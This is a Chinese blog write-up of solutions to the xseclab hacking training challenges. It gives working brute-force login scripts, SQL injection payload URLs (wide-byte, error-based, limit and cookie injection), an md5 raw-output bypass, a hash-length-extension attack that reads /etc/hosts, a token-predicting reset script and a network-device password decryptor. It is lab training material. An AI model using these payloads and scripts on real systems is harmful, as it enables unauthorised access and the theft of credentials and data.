网络信息安全攻防

以前做的时候,挺多不会做的,这次卷土重来,重新刷一下!

脚本关

快速口算

import requests
import re
url="http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php"
session=requests.session()
regular=r'[0-9+*()]+[)]'
header={'Cookie':'PHPSESSID=98f76f8684f350fd7c311decb810cdf8'}
res=session.get(url,headers=header)
print(res.content)
chen=re.compile(regular)
obj=chen.findall(res.content.decode('utf-8'))
print(obj)
html=eval(obj[0])
data={'v':html}
r=session.post(url,data=data,headers=header)
print(r.content)

逗比验证码第一期

该验证码登入一次后,没有失效,再次登入用此验证码,还能生效。

import requests
import re
s=requests.session()
url="http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/login.php"
for pwd in range(1000, 10000):
payload = {'username': 'admin', 'pwd': pwd, 'vcode': '83HE'}
header={'Cookie':'PHPSESSID=98f76f8684f350fd7c311decb810cdf8'}
r=s.post(url,data=payload,headers=header)
print(r.content)
if 'error' not in r.content.decode('utf-8'):
print("正确的密码为:")
print(pwd)
print(r.content)
break
else:
print("正在尝试爆破")
print(pwd)

逗比验证码第二期

import requests, re
import threading

url = 'http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/index.php'
login = 'http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/login.php'
s = requests.session()
c = s.get(url).content.decode('utf-8')
print(c)

lock = threading.Lock()

curTask = 1000
maxTask = 10000
flag = False
right = ''
header = {'Referer': 'http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/index.php',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1'}


def thread():
global lock
global curTask
global maxTask
global flag
global right
global header
while not flag: # 当flag为假也就是正确密码还没出来时,不断取任务来完成
lock.acquire() # 取任务 #这个过程不能被打断
myTask = curTask
curTask = curTask + 1
lock.release()
if myTask >= maxTask: # 所有任务已经完成就退出
break

data = {'username': 'admin', 'pwd': str(myTask), 'vcode': '', 'submit': 'submit'}
c1 = s.post(login, data=data, headers=header).content.decode('utf-8')
print(str(myTask) + ':' + c1)

if 'error' not in c1:
right = str(myTask) + ', ' + c1
flag = True # 当密码正确时,flag为真
# 多线程执行
threadNum = 50
threadlist = []
for i in range(threadNum):
threadlist.append(threading.Thread(target=thread))
for i in threadlist:
i.start()
for i in threadlist:
i.join()
# 最终输出正确结果
print('pwd is ' + right)

逗比的验证码第三期(SESSION)

解法同上面

微笑一下就能过关了

查看源代码可得

<?php  
header("Content-type: text/html; charset=utf-8");
if (isset($_GET['view-source'])) {
show_source(__FILE__);
exit();
}

include('flag.php');

$smile = 1;

if (!isset ($_GET['^_^'])) $smile = 0;
if (preg_match ('/\./', $_GET['^_^'])) $smile = 0;
if (preg_match ('/%/', $_GET['^_^'])) $smile = 0;
if (preg_match ('/[0-9]/', $_GET['^_^'])) $smile = 0;
if (preg_match ('/http/', $_GET['^_^']) ) $smile = 0;
if (preg_match ('/https/', $_GET['^_^']) ) $smile = 0;
if (preg_match ('/ftp/', $_GET['^_^'])) $smile = 0;
if (preg_match ('/telnet/', $_GET['^_^'])) $smile = 0;
if (preg_match ('/_/', $_SERVER['QUERY_STRING'])) $smile = 0;
if ($smile) {
if (@file_exists ($_GET['^_^'])) $smile = 0;
}
if ($smile) {
$smile = @file_get_contents ($_GET['^_^']);
if ($smile === "(●'◡'●)") die($flag);
}
?>
<!doctype html>
<html lang="en">

<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Show me your smile :)</title>
<link rel="stylesheet" href="style.css">
</head>

<body>
<br><br><br><br><br><br><br>
<div class="loginform cf">
<form name="login" action="index.php" method="POST" accept-charset="utf-8">
<ul>
<li>
<label for="SMILE">请使用微笑过关<a href="?view-source">源代码</a></label>
<input type="text" name="T_T" placeholder="where is your smile" required>
</li>
<li><input type="submit" value="Show"> </li>
</ul>
</form>
</div>
<div style="text-align:center;clear:both">
</div>
</body>

</html>

http://lab1.xseclab.com/base13_ead1b12e47ec7cc5390303831b779d47/index.php?^%5f^=data:,(●'◡'●)

注入关

宽字节注入

输入%df’出现报错

http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=2%df'

判断字段长短

http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=2%bf' order by 3 %23

得到显示位

http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=2%bf' union select 1,2,3 %23

显示位为 2,3

查看表名

http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=2%bf' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()) %23

得到字段名

http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=2%bf' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name=0x7361655f757365725f73716c6934) %23

得到字段数据

http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=2%bf' union select 1,2,(select group_concat(title_1,content_1) from sae_user_sqli4) %23

limit注入

猜测后台是

select * from  table limit start,num

发现只有limit参数有用,num没影响

遇到limit的注入的时候,可以使用如下的语句进行报错注入。

select field from user where id=XXX order by id limit 1,1 procedure analyse (extractvalue(rand(),concat(0x3a,SQL注入语句)),1);

得到表名article,user

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=0%20procedure%20analyse(extractvalue(rand(),concat(0x3a,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()))),1)%23%20&num=100%20%23

得到user表中的字段id,username,password,lastloginI

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=0%20procedure%20analyse(extractvalue(rand(),concat(0x3a,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x75736572))),1)%23%20&num=100%20%23

字段数据

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=6 procedure analyse(extractvalue(rand(),concat(0x3a,(select group_concat(username,password) from user))),1)%23
&num=100 %23

图片宽字节注入

在页面上看不出显示的结果,要在burpsuite上查看
网上说是图片宽字节注入,一直抓不到图片的数据包,只好作罢

报错注入

一些常见的报错注入
报错注入语句

select count(*),concat(0x3a,0x3a,(注入语句),0x3a,0x3a,floor(2*rand(0)))a FROM information_schema.tables GROUP BY a

得到数据库名

http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php?username=admin' union select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(2*rand(0)))a FROM information_schema.tables GROUP BY a %23

得到表名

http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php
?username=admin' union select count(*),concat(0x3a,0x3a,(select distinct table_name from information_schema.columns where table_schema=database() limit 0,1),0x3a,0x3a,floor(2*rand(0)))a FROM information_schema.tables GROUP BY a %23

得到字段名

http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php?username=admin' union select count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name=0x6c6f67 limit 0,1),0x3a,0x3a,floor(2*rand(0)))a FROM information_schema.tables GROUP BY a %23

得到表中有多少条数据

http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php?username=admin' union select count(*),concat(0x3a,0x3a,(select count(*) from motto),0x3a,0x3a,floor(2*rand(0)))a FROM information_schema.tables GROUP BY a %23

脱裤失败

http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php
?username=admin' union select count(*),concat(0x3a,0x3a,(select username from motto limit 0,1),0x3a,0x3a,floor(2*rand(0)))a FROM information_schema.tables GROUP BY a %23

尝试别的语句

http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php?username=admin' and extractvalue(1, concat(0x3a,(SELECT distinct concat(0x3a,username,0x3a,motto,0x3a,0x3a) FROM motto limit 3,1)))%23

盲注

sqlmap可以跑出来,网络连接不太好容易断。

cookie注入

在cookie后面加上了一个id=\,报错

Cookie: PHPSESSID=9f5169cbfb23ef8e10ca86f02cae97c9;id=\

得到字段长度

Cookie: PHPSESSID=9f5169cbfb23ef8e10ca86f02cae97c9;id=2 order by 4

得到显示位

Cookie: PHPSESSID=9f5169cbfb23ef8e10ca86f02cae97c9;id=0 union select 1,2,3

得到表名

Cookie: PHPSESSID=9f5169cbfb23ef8e10ca86f02cae97c9;id=0 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())

得到字段名

Cookie: PHPSESSID=9f5169cbfb23ef8e10ca86f02cae97c9;id=0 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='sae_manager_sqli8')

脱裤

Cookie: PHPSESSID=9f5169cbfb23ef8e10ca86f02cae97c9;id=0 union select id,username,password from sae_manager_sqli8

哈希后的密码是不能产生注入的


PLEASE LOGINT!<noscript><?php
include "config.php";
if(isset($_GET['userid']) && isset($_GET['pwd'])){
$strsql="select * from `user` where userid=".intval($_GET['userid'])." and password='".md5($_GET['pwd'], true) ."'";

$conn=mysql_connect($dbhost,$username,$pwd);
mysql_select_db($db,$conn);
$result=mysql_query($strsql);
print_r(mysql_error());
$row=mysql_fetch_array($result);
mysql_close($conn);
echo "<pre>";
print_r($row);

echo "</pre>";
if($row!=null){
echo "Flag: ".$flag;
}

}
else{
echo "PLEASE LOGINT!";
}
echo "<noscript>";
echo file_get_contents(__FILE__);

其中最关键的语句是

select * from user where userid=".intval($_GET['userid'])." and password='".md5($_GET['pwd'], true) ."'

对传入的userid使用了intval()函数转化为数字,同时将password使用md5()函数进行转化。这就是一个典型的MD5加密后的SQL注入。
其中最主要的就是md5()函数,当第二个参数为true时,会返回16字符的二进制格式。当为false的时候,返回的就是32字符十六进制数。默认的是false模式。具体的差别通过下面这个代码来看。

md5("123456");			e10adc3949ba59abbe56e057f20f883e
md5("123456",true);

可以看到当参数为true的时候,md5之后的值就会乱码。
那么只要md5(str,true)之后的值是包含了’or’这样的字符串,那么sql语句就会变为select 8 from users where usrid=”XXX” and password=’’or’‘。如此就可以绕过了。那么这样的str字符串存在吗?所幸还好存在一个,就是ffifdyop。那么我们最终的payload就是:

http://lab1.xseclab.com/code1_9f44bab1964d2f959cf509763980e156/?userid=1&pwd=ffifdyop

或者

http://lab1.xseclab.com/code1_9f44bab1964d2f959cf509763980e156/?userid=1&pwd=129581926211651571912466741651878684928

解密关

以管理员身份登录系统

sukey 值是为时间戳取整,MD5加密而来的

#coding=utf-8
import requests
import hashlib
import time
se=requests.session()
header={'Cookie':'PHPSESSID=c55e14d0b2191166af88d0ac03c48113'}
while True:
sukey=hashlib.new('md5',str(int(time.time())).encode('utf-8')).hexdigest()
url="http://lab1.xseclab.com/password1_dc178aa12e73cfc184676a4100e07dac/reset.php?sukey="+sukey+"&username=admin"
r=se.get(url,headers=header)
time.sleep(0.5)
if r.content:
print(r.content)
break
else:
print('Cracking:'+sukey)

邂逅对门的妹纸

先生成字典。

with open("password.txt","w") as f:
for year in range(1933,1936):
for month in range(1,13):
for day in range(1,32):
f.write("%d%02d%02d\n"%(year,month,day))

用 EWSA 爆破失败,不知啥原因,以后再研究。

思科密码破解

在线解密

uawei/h3c 交换机的加密密码

在window下无法运行此脚本,在kail下即可得。

# coding=utf-8
from Crypto.Cipher import DES

def decode_char(c):
if c == 'a':
r = '?'
else:
r = c
return ord(r) - ord('!')

def ascii_to_binary(s):
assert len(s) == 24
out = [0]*18
i = 0
j = 0

for i in range(0, len(s), 4):
y = decode_char(s[i + 0])
y = (y << 6) & 0xffffff
k = decode_char(s[i + 1])

y = (y | k) & 0xffffff
y = (y << 6) & 0xffffff
k = decode_char(s[i + 2])

y = (y | k) & 0xffffff
y = (y << 6) & 0xffffff
k = decode_char(s[i + 3])
y = (y | k) & 0xffffff

out[j+2] = chr(y & 0xff)
out[j+1] = chr((y>>8) & 0xff)
out[j+0] = chr((y>>16) & 0xff)

j += 3
return "".join(out)

def decrypt_password(p):
r = ascii_to_binary(p)
r = r[:16]
d = DES.new("\x01\x02\x03\x04\x05\x06\x07\x08", DES.MODE_ECB)
r = d.decrypt(r)
return r.rstrip("\x00")

if __name__ == '__main__':
miwen = "aK9Q4I)J'#[Q=^Q`MAF4<1!!"
print u'明文' + decrypt_password(miwen)

```

## 异常数据

字母全部转换为大写的base64。

``` bash
#coding=utf-8
import re
from base64 import *

def change(res,arr,pos):
res.append(''.join(arr))
i=pos
for i in range(i,len(arr)):
if arr[i]<='Z' and arr[i]>='A':
arr[i]=arr[i].lower()
change(res,arr,i+1)
arr[i]=arr[i].upper()

arr=list('AGV5IULSB3ZLVSE=')
res=[]
change(res,arr,0)

res_decode=map(b64decode,res)

for i in res_decode:
if re.findall(r'\\x',repr(i)):
continue
else:
print(i)

md5真的能碰撞嘛?

php特性隐患

<?php
$flag=FLAG;
if(isset($_POST["password"])){
$password=$_POST['password'];
$rootadmin="!1793422703!";
if($password==$rootadmin){die("Please do not attack admin account!");}

if(md5($password)==md5($rootadmin)){
echo $flag;
}else{
die("Password Error!");
}
}
?>

$rootadmin加密后的值为

md5(!1793422703!,32) = 0e332932043729729062996282883873
md5(QNKCDZO,32) = 0e830400451993494058024219903391
md5(240610708,32) = 0e462097431906509019562988736854

构造payload: ?password=QNKCDZO

有签名限制的读取任意文件

哈希长度扩展攻击的简介以及HashPump安装使用方法

解法原文

在kail下使用hashpump

hashpump -s f3d366138601b5afefbd4fc15731692e -d /etc/hosts -k 32 -a chen

得到,包’\x’换成%

3998b374350d22991b9c8f9885194a16
/etc/hosts\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00P\x01\x00\x00\x00\x00\x00\x00chen

构造payload:

?filepath=/etc/hosts%80%00%00%00%00%00%00%00%00%00%00%00%00%00P%01%00%00%00%00%00%00chen
&sign=3998b374350d22991b9c8f9885194a16

综合关

渗透测试第一期

首先有注册和修改密码的选项,先注册一个账号并绑定手机号(查看网页源码得到),注册成功后,知道只有用admin账户登入,才能得到key。到忘记密码
选项去修改密码,发现弹不出手机的验证码。可以猜测到管理员的账号绑定的不是这个手机。突然想起在注册账号的时候有手机绑定,在手机绑定的时候,抓包,把用户名改成admin.绑定成功。然后在回到修改密码哪里,现在可以弹出验证码。修改后。弹出密码。用这个密码登入admin账户,登入成功。

没有注入到底能不能绕过登录

通过robots.txt中可知一个不可访问的文件,直接访问,提示要先登入。
用admin账户,密码随便,登入,提示密码错误,不管弹框,直接输入刚才不可访问文件的链接,得到key。原来后台没有对登入账户进行校验,只要保持一个session就行。

import requests
r = requests.Session()
url = 'http://lab1.xseclab.com/pentest3_307c0281537de1615673af8c1d54885a/'
data = {'username': 'admin', 'password': '123'}
r.post(url, data=data)
url2 = 'http://lab1.xseclab.com/pentest3_307c0281537de1615673af8c1d54885a/myadminroot/'
print (r.get(url2).content)

后面一些题目的解答

当前网速较慢或者你使用的浏览器不支持博客特定功能,请尝试刷新或换用Chrome、Firefox等现代浏览器